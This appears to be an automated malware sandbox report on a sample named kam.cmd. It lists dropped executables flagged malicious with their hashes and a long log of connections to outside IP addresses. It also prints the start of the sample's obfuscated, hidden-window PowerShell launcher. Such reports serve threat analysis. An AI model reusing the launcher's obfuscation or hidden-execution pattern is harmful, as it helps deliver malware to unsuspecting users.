                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):922944
                                                                              Entropy (8bit):6.405617419551067
                                                                              Encrypted:false
                                                                              SSDEEP:12288:r9/Bro8OEYbhEdbsrg4Sxz2/Sl92ncG15fQ224i5pQ+poPCcqyt4:x/BrnYuqFcL3pQ+pDX
                                                                              MD5:C8FAC366154F4FF47A7FBB3FE4BD2B2F
                                                                              SHA1:030C41FCF646FABD9020B957EDB47EE51D723028
                                                                              SHA-256:D0715B811F5141AC52B2ADFD8BE547420A69D37705708EAD803B799D0B3EECEF
                                                                              SHA-512:454C9BACDD6AC22ED99646A851989F2003A983BF70BC36F0BC451271C77F4CF8F63291426F0ACEC9DE63E56274BDFE893FE45F62465D1A39C076355D8DCCB580
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):692064
                                                                              Entropy (8bit):7.130899608128055
                                                                              Encrypted:false
                                                                              SSDEEP:12288:qskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:qsZgjS1hqgSC/izkfFjymk4HM5yJwMK
                                                                              MD5:77555D5F69BB2A59A77A0AE6C4E90E2A
                                                                              SHA1:312A7728F788511414A3AE803DC7EB85C8807FB9
                                                                              SHA-256:B93B5BF45B3FB87F4BCBE2F97B41071C0C68712B3BFA2455C711DF2C9E85B7D4
                                                                              SHA-512:43D39F39C2E6F50866B4B3D9592EB0C3FDE254822A7B9206C11C7C2054BE9023A5116395F0E181A21A5F149A7C9338B4C81DC85B5304841632AC9C5C9D3BFFD4
                                                                              Malicious:true
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):11608
                                                                              Entropy (8bit):4.8908305915084105
                                                                              Encrypted:false
                                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                              MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                              SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                              SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                              SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllultnxj:NllU
                                                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                              Malicious:false
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):475136
                                                                              Entropy (8bit):6.119576160135665
                                                                              Encrypted:false
                                                                              SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                                              MD5:72AD21D191B58842334D32A381EA7FA8
                                                                              SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                                              SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                                              SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):182272
                                                                              Entropy (8bit):6.486621682985029
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkd4WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:oBmCtnRPF9cCGr/uH0gkSdQB
                                                                              MD5:04712BCBEE377C2B2054D801CC3C4CD2
                                                                              SHA1:93076F652326A517F4D325DD85FAD044A7BEF755
                                                                              SHA-256:B217D6FA0ACE851216ADF5F3CB58A8A03ABFFC15EB1DC6C1F5B11FC99F069BA4
                                                                              SHA-512:334CB034F585CC9A53D6D69136253A3720BB64F3D4C398F40E56AF18DB692DA7800DE0D4B8BDCAFE9B031A3C280432BAF6CEBA1FA1FE5B345887E4E3337038DD
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                              Category:modified
                                                                              Size (bytes):8
                                                                              Entropy (8bit):3.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:xY:K
                                                                              MD5:9E263FED6A41AC855AF6A28BA53487B0
                                                                              SHA1:B90F41E04A9FAC1F158FEABC75E16708626597CB
                                                                              SHA-256:411AEBB55255DFE1FDD952269D99D386E7DCB945395DC15E3700F16C68FBFB04
                                                                              SHA-512:95B42E09E6A436A864CD02DC4D46CEB988C928B9AFB9AF7F5CA1D1579EE4C0A841FD50EB28B33BD5995FB0F5036CC050F6D943E7E4A4885DB67F91FF6766E164
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):465356
                                                                              Entropy (8bit):5.94994796092683
                                                                              Encrypted:false
                                                                              SSDEEP:12288:3QBHDDhOcJNDjhEkOVtAQXW/EHlZNq8XEZcFJYBSQYCu:g1nNDVTOUQG8HlqyEGFGXYCu
                                                                              MD5:595A09748EC54D46958B4FC48E232E43
                                                                              SHA1:A1C64C8815EDA873408F9E6D51519F46CCD9B6B0
                                                                              SHA-256:C5179F092DCC764D1869E5FDB1A667032C0EF1A6C9DE4B7D1AD30126B2C47A65
                                                                              SHA-512:83DA041C266FB9286A2226A04740310E3CAFADCCA968B4DFAC1494DB111AC3F54580763AF6E4C1A128CBB4363197DD85D26895C1DDDB4BDB46DAAC151FC5038F
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6222
                                                                              Entropy (8bit):3.7181769263444533
                                                                              Encrypted:false
                                                                              SSDEEP:96:6GgKCNoahkvhkvCCtlfxJNrRJHGfxJNroJHP:6jbnlf/Ef/6
                                                                              MD5:54BCA57240B697520BA0A97BCCED8CC8
                                                                              SHA1:9389A8B071D613F37492818314DD4A5C7535B9A5
                                                                              SHA-256:41A79A8B40E58D5428F2CCB09A0BED3D93EE1A7C2565C7C838D6D203BCDB84D4
                                                                              SHA-512:8DE288F1DCFBE2A469B04E67C6192DFBB38876AF093198C9160C9264F6A947C06E49012D09091087494EE3B60F4DEED887FD8898375346F889F4DD6FE9CE0494
                                                                              Malicious:false
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                              Category:dropped
                                                                              Size (bytes):1835008
                                                                              Entropy (8bit):4.418964041870103
                                                                              Encrypted:false
                                                                              SSDEEP:6144:zSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:+vloTMW+EZMM6DFyn03w
                                                                              MD5:F451B9B7369576477928A88519907AAD
                                                                              SHA1:77E1BAE1BD95626B063C441CCE946325D184F3EC
                                                                              SHA-256:F60E00430E9F88BC18F7B740ED4ADDE555379147DB00602FE9BB13E1EAE96FF9
                                                                              SHA-512:C36454EB1E969E50041676032B229F70D6623F384559F3817D3883ED8EB6965BCBC8C872E3615CC9442DA6C5DBBE9267EFAB29EC1F2B340A2C10FA51E61F70C8
                                                                              Malicious:false
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):41472
                                                                              Entropy (8bit):4.812812916305451
                                                                              Encrypted:false
                                                                              SSDEEP:384:sPpOlINgIP79gB3pzhTkR6ETphjuuVnSk8YXiGHgrHL6Zh9oWIkUinksTyCOeM:sEl9bbSVh7VWYOzL49oWPksTyIM
                                                                              MD5:E11C7C303771F18E1542B2C742879D3F
                                                                              SHA1:C37CBCA2FD214FB68A62BACAC27D54C660DF91ED
                                                                              SHA-256:4770F9E9EF9F85A0E5DED7D6EC4BF56EEF45C831EF623C3DCE84EFFBA40ADDAC
                                                                              SHA-512:D9A274D422793A73E8E8BC4745882C7AF0CE34341A62385DA2C026BAB58AAAF6E49044CEF8FFEF68EF24FDD95DEBCD16FA4E79598D29885D6E4A9707B6884A8E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              File type:ASCII text, with very long lines (6364), with no line terminators
                                                                              Entropy (8bit):5.268526468361687
                                                                              TrID:
                                                                                File name:kam.cmd
                                                                                File size:6'364 bytes
                                                                                MD5:c7b720a0f6bffebe027826a2508c52dc
                                                                                SHA1:41b21cdcd0afd9363d1c79202d687c65fc6128b4
                                                                                SHA256:c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562
                                                                                SHA512:4e519b29716116807d312aa87453f57eca6893dc84fb4a761ac569c240b5ef617854f6f14a1bcac00ebf9e142ecb0d9d437d48a3542f5cae5bf6d09e5050c199
                                                                                SSDEEP:96:549QmKe2Eb8DxZzthv2iDf8r0dMxmr8BhG+ZmrJ2iCzs:5Le2BYPSE5dlzs
                                                                                TLSH:D5D15DCD0F05355E429A82D8A925D78E0D06D7DDECE893D2DB7CA62C201EEB42A1DC66
                                                                                File Content Preview:start /min powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Int
                                                                                Icon Hash:9686878b929a9886
                                                                                 Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                                                 May 23, 2024 20:12:41.269011974 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.269064903 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:41.269155979 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.278933048 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.278945923 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:41.777451992 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:41.777731895 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.781081915 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.781091928 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:41.781287909 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:41.790971041 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:41.838542938 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:42.072879076 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:42.072928905 CEST  443          49704      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:12:42.072981119 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:42.076308012 CEST  49704        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:12:42.172293901 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.172321081 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:42.172386885 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.172696114 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.172704935 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:42.852545977 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:42.852642059 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.858967066 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.858973980 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:42.859189034 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:42.863171101 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:42.906531096 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.098148108 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.098166943 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.098238945 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.098247051 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.098284006 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.098311901 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.098342896 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.130240917 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.130259991 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.130341053 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.130346060 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.130388021 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.188857079 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.188873053 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.188955069 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.188961029 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.189004898 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.212388992 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.212402105 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.212486029 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.212488890 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.212523937 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.226284981 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.226300001 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.226361036 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.226365089 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.226404905 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.242418051 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.242430925 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.242495060 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.242496967 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.242542982 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.280093908 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.280117989 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.280196905 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.280205965 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.280246973 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.292391062 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.292407990 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.292465925 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.292469978 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.292509079 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.300681114 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.300693989 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.300756931 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.300760031 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.300797939 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.309473038 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.309489965 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.309549093 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.309552908 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.309590101 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.316450119 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.316462040 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.316521883 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.316524982 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.316561937 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.322920084 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.322932959 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.322990894 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.322993994 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.323031902 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.369021893 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.369045019 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.369127989 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.369137049 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.369177103 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.375022888 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.375037909 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.375094891 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.375102043 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.375140905 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.380589962 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.380605936 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.380659103 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.380665064 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.380703926 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.386878014 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.386894941 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.386946917 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.386955023 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.386991024 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.390017033 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.390031099 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.390084028 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.390089989 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.390127897 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.394856930 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.394871950 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.394923925 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.394927979 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.394963026 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.398411036 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.398427010 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.398494005 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.398497105 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.398534060 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.432159901 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.432173967 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.432270050 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.432274103 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.432317019 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.457859039 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.457895041 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.457976103 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.457990885 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.458034992 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.461679935 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.461707115 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.461781025 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.461786032 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.461827993 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.465089083 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.465111017 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.465167999 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.465173006 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.465213060 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.468111038 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.468131065 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.468170881 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.468175888 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.468202114 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.468220949 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.471121073 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.471143961 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.471200943 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.471205950 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.471246958 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.473886967 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.473907948 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.473952055 CEST  49705        443        192.168.2.5    69.31.136.17
